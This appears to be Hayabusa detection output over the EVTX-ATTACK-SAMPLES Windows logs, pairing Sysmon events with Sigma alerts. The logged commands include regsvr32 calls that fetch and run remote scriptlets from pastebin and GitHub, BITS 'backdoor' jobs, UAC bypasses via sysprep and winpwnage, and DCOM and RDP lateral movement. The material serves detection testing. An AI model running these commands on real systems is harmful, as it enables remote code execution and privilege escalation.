+2019-05-13 02:09:02.275 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 1528 | PGUID: 365ABB72-532E-5CD8-0000-00106C222700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
+2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
+2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Evas,Code Execution via Pcwutl.dll,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx
+2019-05-13 02:20:01.980 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135f2 | PID: 4092 | PGUID: 365ABB72-55C1-5CD8-0000-0010970D2F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 02:20:31.183 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x135f2 | PID: 956 | PGUID: 365ABB72-55DF-5CD8-0000-001018532F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 02:20:49.443 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt | LID: 0x135f2 | PID: 2392 | PGUID: 365ABB72-55F1-5CD8-0000-0010781C3300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Exec | Evas,Suspicious ftp.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 02:20:49.458 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\system32\calc.exe | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe | LID: 0x135f2 | PID: 684 | PGUID: 365ABB72-55F1-5CD8-0000-00103D1E3300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx
+2019-05-13 03:04:50.121 +09:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: backdoor | URL: C:\Windows\system32\cmd.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx
+2019-05-13 03:35:05.155 +09:00,IEWIN7,1,info,,Process Created,"Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13eee | PID: 1420 | PGUID: 365ABB72-6759-5CD8-0000-0010E2D50F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:05.780 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll | LID: 0x13eee | PID: 1912 | PGUID: 365ABB72-6759-5CD8-0000-001085031000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:06.562 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49165 (IEWIN7..home) | Dst: 104.20.208.21:80 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 1420 | PGUID: 365ABB72-6759-5CD8-0000-0010E2D50F00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,../hayabusa-rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx
+2019-05-13 03:48:52.219 +09:00,IEWIN7,1,info,,Process Created,"Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | Process: C:\ProgramData\jabber.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13715 | PID: 1340 | PGUID: 365ABB72-6A94-5CD8-0000-00101BDB0E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx
+2019-05-13 03:48:52.766 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll | LID: 0x13715 | PID: 3880 | PGUID: 365ABB72-6A94-5CD8-0000-0010C2F10E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx
+2019-05-13 23:50:59.389 +09:00,IEWIN7,59,info,Evas | Persis,Bits Job Created,Job Title: hola | URL: C:\Windows\system32\cmd.exe,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx
+2019-05-14 03:02:49.160 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mobsync.exe -Embedding | Process: C:\Windows\System32\mobsync.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1341d | PID: 3828 | PGUID: 365ABB72-B147-5CD9-0000-00109D4F0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.681 +09:00,IEWIN7,1,info,,Process Created,Cmd: /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x133de | PID: 2372 | PGUID: 365ABB72-B167-5CD9-0000-0010EE150C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.681 +09:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x1341d | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:19.895 +09:00,IEWIN7,1,info,,Process Created,Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: /c notepad.exe | LID: 0x133de | PID: 2584 | PGUID: 365ABB72-B167-5CD9-0000-00109D240C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:21.212 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49159 (IEWIN7) | Dst: 151.101.128.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,../hayabusa-rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 03:05:18.692 +09:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 1188 | PGUID: 365ABB72-B1DE-5CD9-0000-0010715B0D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx
+2019-05-14 09:29:52.744 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:58172 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx
+2019-05-14 09:32:22.775 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55099 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx
+2019-05-14 09:32:36.775 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55101 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx
+2019-05-14 10:29:04.306 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mshta.exe -Embedding | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1070ce | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
+2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
+2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
+2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Evas,MSHTA Spwaned by SVCHOST,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
+2019-05-14 10:29:05.534 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49168 (IEWIN7) | Dst: 10.0.2.17:55683 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2676 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2676 | PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 3964 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 3964 | PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.143 +09:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 288 03573528 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3776 | PGUID: 365ABB72-28D3-5CDA-0000-0010B08B1300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.453 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 1020 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.453 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 1020 | PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.470 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2768 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.470 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2768 | PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.487 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\explorer.exe | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 572 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.487 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 572 | PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.487 +09:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 312 0197CDB0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3388 | PGUID: 365ABB72-28D3-5CDA-0000-001055AD1300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.814 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13545 | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.831 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\cryptbase.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: Yokai Ltd. | Signed: false | Signature: Unavailable | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300 | Hash: SHA1=4DA0DCAD144039F6DD7739E37AB3A7B78FB86B4D,MD5=2BA4BC4753A29D56AA185C972CA1023E,SHA256=A6BE522A1FC48B391EFCB3A3CFE49560A455F1BB853505F7E9ACCA8EDF116B4C,IMPHASH=380A21A3D5988707B0CFE7CA5B1C7E0B",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 11:32:51.831 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | LID: 0x13545 | PID: 3976 | PGUID: 365ABB72-28D3-5CDA-0000-001088C71300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx
+2019-05-14 23:03:45.100 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09c49153\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
+2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.exe | Process: C:\Windows\system32\mstsc.exe | PID: 2580 | PGUID: ECAD0485-C903-5CDA-0000-0010340F1000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
+2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,C2,Hijack Legit RDP Session to Move Laterally,,../hayabusa-rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx
